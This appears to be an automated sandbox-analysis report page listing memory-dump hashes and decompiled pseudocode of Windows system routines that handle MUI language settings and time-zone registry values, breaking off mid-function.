Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A

Uniqueness

Uniqueness Score: -1.00%

Function 00C1FBE8, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986

Uniqueness

Uniqueness Score: -1.00%

Function 00C1FB50, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447

Uniqueness

Uniqueness Score: -1.00%

Function 00C20C40, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547

Uniqueness

Uniqueness Score: -1.00%

Function 00C1FC48, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456

Uniqueness

Uniqueness Score: -1.00%

Function 00C1FC30, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 00C21D80, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686

Uniqueness

Uniqueness Score: -1.00%

Function 00C1FD5C, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 00C1FE24, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456

Uniqueness

Uniqueness Score: -1.00%

Function 00C1FFFC, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B

Uniqueness

Uniqueness Score: -1.00%

Function 00C1FF34, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A

Uniqueness

Uniqueness Score: -1.00%

Function 00C48788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00C48788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00C48460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E00C2E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E00C4718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00C48460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E00C2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E00C4718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00C48460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00C48460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00C48460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E00C2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E00C2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E00C4718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E00C2E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00C22340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E00C3E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E00C2E2A8(_t322,  &_v68, _v16);
								if(E00C45553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E00C3E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E00C2E2A8(_t322,  &_v68, _t236);
								if(E00C45553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E00C2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E00C2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E00C4718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E00C2E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00C22340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E00C3E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E00C2E2A8(_v12,  &_v68, _v16);
							if(E00C45553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E00C3E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E00C2E2A8(_t322,  &_v68, _t269);
							if(E00C45553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E00C2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E00C2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E00C4718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E00C2E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00C22340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E00C3E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E00C2E2A8(_v12,  &_v68, _v16);
						if(E00C45553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E00C3E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E00C2E2A8(_t322,  &_v68, _t296);
						if(E00C45553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E00C2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E00C2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x00c48788
0x00c48788
0x00c48791
0x00c48794
0x00c48798
0x00c4879b
0x00c4879e
0x00c487a1
0x00c487a4
0x00c487a7
0x00c487aa
0x00c487af
0x00c91ad3
0x00c48b0a
0x00c48b0d
0x00c48b13
0x00c48b19
0x00c48b1f
0x00c48b25
0x00c48b2b
0x00c48b31
0x00c48b37
0x00c48b3d
0x00c48b46
0x00c48b46
0x00c487c6
0x00c487d0
0x00c91ae0
0x00c91ae6
0x00c91af8
0x00c91af8
0x00c91afd
0x00c91afe
0x00c91b01
0x00c91b06
0x00c91b06
0x00c487d6
0x00c487f2
0x00c487f7
0x00c48807
0x00c4880a
0x00c4880f
0x00c48810
0x00c48813
0x00c48818
0x00c48818
0x00c4882c
0x00c48831
0x00c48838
0x00c48908
0x00c48920
0x00c489f0
0x00c48a08
0x00c48af6
0x00c48af6
0x00c48af8
0x00c48afb
0x00c91beb
0x00c91beb
0x00c48b04
0x00c91bf8
0x00c91c0e
0x00c91c13
0x00c91c16
0x00c91c16
0x00c91bf8
0x00000000
0x00c48b04
0x00c48a0e
0x00c48a11
0x00c48a14
0x00c48a15
0x00c48a18
0x00c48a22
0x00c48b59
0x00c48a28
0x00c48a3c
0x00c48a3c
0x00c48a42
0x00c91bb0
0x00c91b11
0x00c91b11
0x00000000
0x00c48a48
0x00c48a51
0x00c48a5b
0x00c48a5e
0x00c48a61
0x00c48a69
0x00c48a69
0x00c48a6d
0x00000000
0x00000000
0x00c48a74
0x00c48a7c
0x00c48a7d
0x00c48a91
0x00c48a93
0x00c48a93
0x00c48a98
0x00c48a9b
0x00c48aa1
0x00c48aa1
0x00c48aa4
0x00c48aaa
0x00c48ab1
0x00c48ac5
0x00c48ac7
0x00c48ac7
0x00c48ac5
0x00c48ace
0x00c91bc9
0x00c91bce
0x00c91bd2
0x00c91bd2
0x00c48ad8
0x00c48aeb
0x00c48aeb
0x00c48af0
0x00c48af4
0x00000000
0x00c48af4
0x00c48a42
0x00c48926
0x00c48929
0x00c4892c
0x00c4892d
0x00c48930
0x00c48935
0x00c4893a
0x00c48b51
0x00c48940
0x00c48954
0x00c48954
0x00c4895a
0x00c91b63
0x00000000
0x00c48960
0x00c48969
0x00c48973
0x00c48976
0x00c48979
0x00c4897e
0x00c48981
0x00c48981
0x00c48986
0x00000000
0x00000000
0x00c91b6e
0x00c91b74
0x00c91b7b
0x00c91b8f
0x00c91b91
0x00c91b91
0x00c91b99
0x00c91b9c
0x00c91ba2
0x00c91ba2
0x00c4898c
0x00c48992
0x00c48999
0x00c489ad
0x00c91ba8
0x00c91ba8
0x00c489ad
0x00c489b6
0x00c489c8
0x00c489cd
0x00c489d0
0x00c489d0
0x00c489d6
0x00c489e8
0x00c489e8
0x00c489ed
0x00000000
0x00c489ed
0x00c4895a
0x00c4883e
0x00c48841
0x00c48844
0x00c48845
0x00c48848
0x00c4884d
0x00c48852
0x00c48b49
0x00c48858
0x00c4886c
0x00c4886c
0x00c48872
0x00c91b0e
0x00000000
0x00c48878
0x00c48881
0x00c4888b
0x00c4888e
0x00c48891
0x00c48896
0x00c48899
0x00c48899
0x00c4889e
0x00000000
0x00000000
0x00c91b21
0x00c91b27
0x00c91b2e
0x00c91b42
0x00c91b44
0x00c91b44
0x00c91b4c
0x00c91b4f
0x00c91b55
0x00c91b55
0x00c488a4
0x00c488aa
0x00c488b1
0x00c488c5
0x00c91b5b
0x00c91b5b
0x00c488c5
0x00c488ce
0x00c488e0
0x00c488e5
0x00c488e8
0x00c488e8
0x00c488ee
0x00c48900
0x00c48900
0x00c48905
0x00000000
0x00c48905

APIs

_wcspbrk.LIBCMT ref: 00C48891
_wcspbrk.LIBCMT ref: 00C48979
_wcspbrk.LIBCMT ref: 00C48A61
_wcspbrk.LIBCMT ref: 00C48A9B
_wcspbrk.LIBCMT ref: 00C91B9C

Strings

Kernel-MUI-Language-Allowed, xrefs: 00C48827
Kernel-MUI-Language-SKU, xrefs: 00C489FC
Kernel-MUI-Language-Disallowed, xrefs: 00C48914
WindowsExcludedProcs, xrefs: 00C487C1
Kernel-MUI-Number-Allowed, xrefs: 00C487E6

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: e90acb615144c4311d6b6e1518c74488af4ec47eedb8886e133a950695a9ef97
Instruction ID: ba6e1ce480638403a30a89e470648281feaed38709744b747e9be20a1d80d544
Opcode Fuzzy Hash: e90acb615144c4311d6b6e1518c74488af4ec47eedb8886e133a950695a9ef97
Instruction Fuzzy Hash: 18F104B2D00219EFCF11EFA5C981DEEBBB9FF08300F14446AE515A7651EB349A45EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CB822C, Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00CB822C(void* __ecx, void* __edx, signed int _a4, signed int _a8) {
				char _v8;
				void* __ebx;
				signed int _t41;
				void* _t42;
				signed int* _t50;
				void* _t71;
				void* _t73;
				void* _t78;
				signed int _t81;
				void* _t84;

				_push(__ecx);
				_t81 = _a4;
				_t84 = 0x20;
				_t71 = E00CD5A34(_t81 + 4, _t84);
				if(_t71 < _t84) {
					_t41 = E00CD5A34(_t81 + 0x58, _t84);
					_pop(_t78);
					_a4 = _t41;
					__eflags = _t41 - _t84;
					if(_t41 >= _t84) {
						goto L1;
					} else {
						_t42 = E00C77DCD(1,  &_v8);
						__eflags = _t42;
						if(__eflags >= 0) {
							__eflags = E00CB810D(_t71, _t78, __eflags, 0x40000000, _v8, L"Bias", 4, _t81, 4);
							if(__eflags < 0) {
								L14:
								_a4 = 0;
								_t73 = E00CB810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1,  &_a4, 2);
								__eflags = _t73;
								if(__eflags >= 0) {
									_a8 =  *(_t81 + 0x1ac) & 0x000000ff;
									_t50 =  &_a8;
									goto L16;
								}
							} else {
								_t8 = _t71 + 2; // 0x2
								__eflags = E00CB810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardName", 1, _t81 + 4, _t71 + _t8);
								if(__eflags < 0) {
									goto L14;
								} else {
									_t71 = 4;
									__eflags = E00CB810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardBias", _t71, _t81 + 0x54, _t71);
									if(__eflags < 0) {
										goto L14;
									} else {
										__eflags = E00CB810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardStart", 3, _t81 + 0x44, 0x10);
										if(__eflags < 0) {
											goto L14;
										} else {
											__eflags = E00CB810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightName", 1, _t81 + 0x58, _a4 + _a4 + 2);
											if(__eflags < 0) {
												goto L14;
											} else {
												__eflags = E00CB810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightBias", _t71, _t81 + 0xa8, _t71);
												if(__eflags < 0) {
													goto L14;
												} else {
